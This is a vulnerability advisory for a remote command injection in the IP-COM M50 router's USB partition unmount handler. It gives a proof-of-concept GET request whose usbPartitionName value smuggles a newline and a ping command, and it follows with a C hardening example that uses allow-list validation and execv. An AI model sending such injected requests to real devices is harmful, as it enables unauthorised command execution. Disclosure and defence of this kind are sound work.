# ip-com-12
- vendor: IP-COM
- product: M50
- version: V15.11.0.33(10768)
- type: Remote Command Injection
- author: Yifeng Li, Wolin Zhuang
## Vulnerability description
We found a command injection vulnerability in IP-COM Technology's M50 router running the recently released firmware: a crafted GET request allows remote attackers to execute arbitrary OS commands.
## Remote Command Injection vulnerability
In the formSetUSBPartitionUmount function, the value of the "usbPartitionName" parameter is insufficiently filtered before it is passed to the OS, so a request that controls usbPartitionName with a value such as `-h%0aping%20x.x.x.x%20-w%2-5%0a` (a URL-encoded newline followed by a second command) can attack the OS.
![](https://i.imgur.com/ZDXGwpn.png)
![](https://i.imgur.com/sJ3AykL.png)
## PoC
### Remote Command Injection
We set the value of "usbPartitionName" to `aaa\nping x.x.x.x` and the router executes the ping command.

```
example.com/action/umountUSBPartition?usbPartitionName=-h%0aping%20x.x.x.x%20-w%2-5%0a
```
![](https://i.imgur.com/dMRyJQU.jpg)
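The root cause described above is a user-supplied partition name reaching the OS without filtering, so a `%0a` (newline) in the query string becomes a command separator. The following is an added example of how a handler for this parameter can be hardened; it is written for this page and is not the M50 firmware's code. It assumes that the handler receives the raw query-string value (the `usbPartitionName` parameter from the PoC) and that the intended operation is unmounting a device under `/dev/`; the `url_decode`, `is_safe_partition_name` and `safe_umount_partition` names are this example's own. The two defensive layers are an allow-list on the decoded value (letters and digits only, so newline, space, `-` and every other shell metacharacter are rejected) and running `umount` through `execv` with an argument vector instead of building a shell command string.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Decode %XX escapes (and '+') from a query-string value into out.
 * Returns the decoded length, or -1 on a malformed escape or overflow. */
int url_decode(const char *in, char *out, size_t outlen) {
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (o + 1 >= outlen) return -1;
        if (in[i] == '%') {
            if (!isxdigit((unsigned char)in[i + 1]) ||
                !isxdigit((unsigned char)in[i + 2])) return -1;
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            out[o++] = (char)strtol(hex, NULL, 16);
            i += 2;
        } else if (in[i] == '+') {
            out[o++] = ' ';
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Helper for checking decode results: 1 if `in` decodes to `expected`. */
int decodes_to(const char *in, const char *expected) {
    char buf[64];
    if (url_decode(in, buf, sizeof buf) < 0) return 0;
    return strcmp(buf, expected) == 0;
}

/* Allow-list check: accept only a short name that starts with a letter
 * and consists of [A-Za-z0-9] (e.g. "sda1"). Newline, space, '-', ';',
 * '/', quotes and every other metacharacter are rejected outright. */
int is_safe_partition_name(const char *name) {
    size_t n = strlen(name);
    if (n == 0 || n > 15) return 0;
    if (!isalpha((unsigned char)name[0])) return 0;
    for (size_t i = 0; i < n; i++) {
        if (!isalnum((unsigned char)name[i])) return 0;
    }
    return 1;
}

/* Hardened handler: decode, validate, then run umount via execv with an
 * argument vector (no shell), so a value can never become a second
 * command. Returns -1 if the value is rejected or the child could not be
 * run, otherwise umount's exit status. */
int safe_umount_partition(const char *raw_query_value) {
    char name[64];
    if (url_decode(raw_query_value, name, sizeof name) < 0) return -1;
    if (!is_safe_partition_name(name)) return -1;

    char dev[80];
    snprintf(dev, sizeof dev, "/dev/%s", name);
    char *const argv[] = { "umount", dev, NULL };

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv("/bin/umount", argv);  /* argv[1] is one opaque argument */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs: the PoC value from this advisory and a benign one. */
    const char *injected = "-h%0aping%20x.x.x.x%20-w%2-5%0a";
    const char *benign   = "sda1";
    char decoded[64];
    if (url_decode("-h%0aping%20x.x.x.x", decoded, sizeof decoded) >= 0)
        printf("decoded value passes allow-list: %d\n",
               is_safe_partition_name(decoded));
    printf("benign value passes allow-list: %d\n",
           is_safe_partition_name(benign));
    printf("injected request rejected: %d\n",
           safe_umount_partition(injected) == -1);
    return 0;
}
```

Decoding before validation matters: checking the raw `%0a` string for a literal newline would miss the injection, while the allow-list on the decoded value catches it (and the `%2-` in the PoC, which is not a valid escape, is rejected at the decode step anyway). Running `umount` via `execv` is the second, independent layer; it is what makes a future validation gap non-exploitable as command injection.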